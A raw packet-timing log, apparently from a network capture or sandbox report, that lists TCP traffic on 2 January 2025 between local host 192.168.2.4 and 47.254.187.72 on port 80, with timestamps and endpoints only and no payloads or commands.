                                                                            Jan 2, 2025 20:34:53.622740984 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.623688936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.623706102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.623716116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.623733044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.623743057 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.623744011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.623754025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.623764992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.623776913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.623785973 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.623816967 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.624816895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.624829054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.624840021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.624850035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.624860048 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.624862909 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.624870062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.624881983 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.624897957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.624900103 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.624919891 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.624952078 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.694989920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695084095 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.695107937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695120096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695139885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695151091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695157051 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.695163012 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695173979 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695184946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695192099 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.695195913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695205927 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695218086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695230007 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.695251942 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.695278883 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695290089 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695302963 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695324898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695338011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695347071 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.695354939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695365906 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695372105 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.695375919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695386887 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695396900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695406914 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695409060 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.695416927 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695429087 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695442915 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.695450068 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.695460081 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695467949 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.695472002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695482969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695493937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695503950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695516109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695521116 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.695533037 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695549965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695552111 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.695560932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695565939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695574045 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.695575953 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695585966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695596933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695599079 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.695617914 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.695633888 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.695739985 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695749998 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695761919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695779085 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695789099 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695800066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695806980 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.695806980 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.695811033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695822954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695847034 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.695858002 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.695892096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.695946932 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.695991039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.696002007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.696012974 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.696023941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.696034908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.696034908 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.696053028 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.696062088 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.696063995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.696079969 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.696082115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.696094990 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.696100950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.696106911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.696110010 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.696145058 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.696218014 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.696228981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.696240902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.696257114 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.696290970 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.696305990 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.696316957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.696331978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.696341038 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.696341991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.696353912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.696374893 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.696400881 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.698546886 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.698570013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.698580980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.698590994 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.698602915 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.698612928 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.698623896 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.698628902 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.698635101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.698667049 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.698709965 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.700537920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.700551987 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.700571060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.700589895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.700601101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.700602055 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.700619936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.700630903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.700635910 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.700642109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.700660944 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.700680017 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.704477072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.704490900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.704508066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.704519033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.704530001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.704554081 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.704557896 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.704565048 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.704576969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.704581976 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.704586029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.704623938 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.709311008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.709325075 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.709342957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.709353924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.709367037 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.709377050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.709377050 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.709388018 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.709400892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.709424019 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.709448099 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.709455013 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.709456921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.709464073 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.709494114 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.709496975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.709506989 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.709508896 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.709527969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.709533930 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.709537983 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.709543943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.709547997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.709558964 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.709587097 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.710408926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.710431099 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.710453987 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.710479021 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.710546017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.710556984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.710567951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.710577965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.710588932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.710598946 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.710599899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.710633993 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.711469889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.711524963 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.711525917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.711536884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.711548090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.711560965 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.711565971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.711576939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.711580038 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.711587906 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.711599112 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.711622953 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.711641073 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.781821966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.781847000 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.781858921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.781869888 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.781883955 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.781900883 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.781908035 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.781912088 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.781920910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.781930923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.781938076 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.781943083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.781946898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.781958103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.781969070 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.781981945 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.781987906 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.782023907 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.782038927 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782048941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782059908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782068968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782078981 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.782078981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782089949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782097101 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.782105923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782118082 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782124996 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.782128096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782140017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782150030 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782155037 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.782172918 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.782177925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782190084 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782200098 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.782205105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782217026 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.782219887 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782243967 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.782257080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782268047 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.782285929 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.782322884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782332897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782342911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782352924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782370090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782371044 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.782380104 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782391071 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782397032 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.782402039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782414913 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.782442093 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.782524109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782533884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782545090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782556057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782556057 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.782588959 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.782607079 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782627106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782639027 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782646894 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.782649040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782660961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.782676935 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.782706022 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:54.315299034 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:54.320265055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:54.702008963 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:54.702028036 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:54.702039003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:54.702049971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:54.702088118 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:54.702126026 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:54.703608990 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:54.703660965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:54.703670979 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:54.703680992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:54.703708887 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:54.703732967 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:54.705251932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:54.705287933 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:54.705295086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:54.705327034 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:54.821676016 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:54.826625109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.222863913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.222899914 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.222910881 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.222986937 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.222986937 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.224308014 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.224318981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.224328995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.224340916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.224349976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.224353075 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.224379063 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.227792025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.227802992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.227813005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.227823973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.227838993 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.227860928 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.229389906 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.229399920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.229415894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.229427099 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.229433060 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.229440928 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.229449034 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.229465008 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.229480982 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.232712984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.232722998 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.232733011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.232759953 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.232762098 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.232770920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.232793093 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.232809067 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.234519005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.234530926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.234540939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.234551907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.234575033 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.234590054 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.236107111 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.236118078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.236128092 CET804973047.254.187.72192.168.2.4
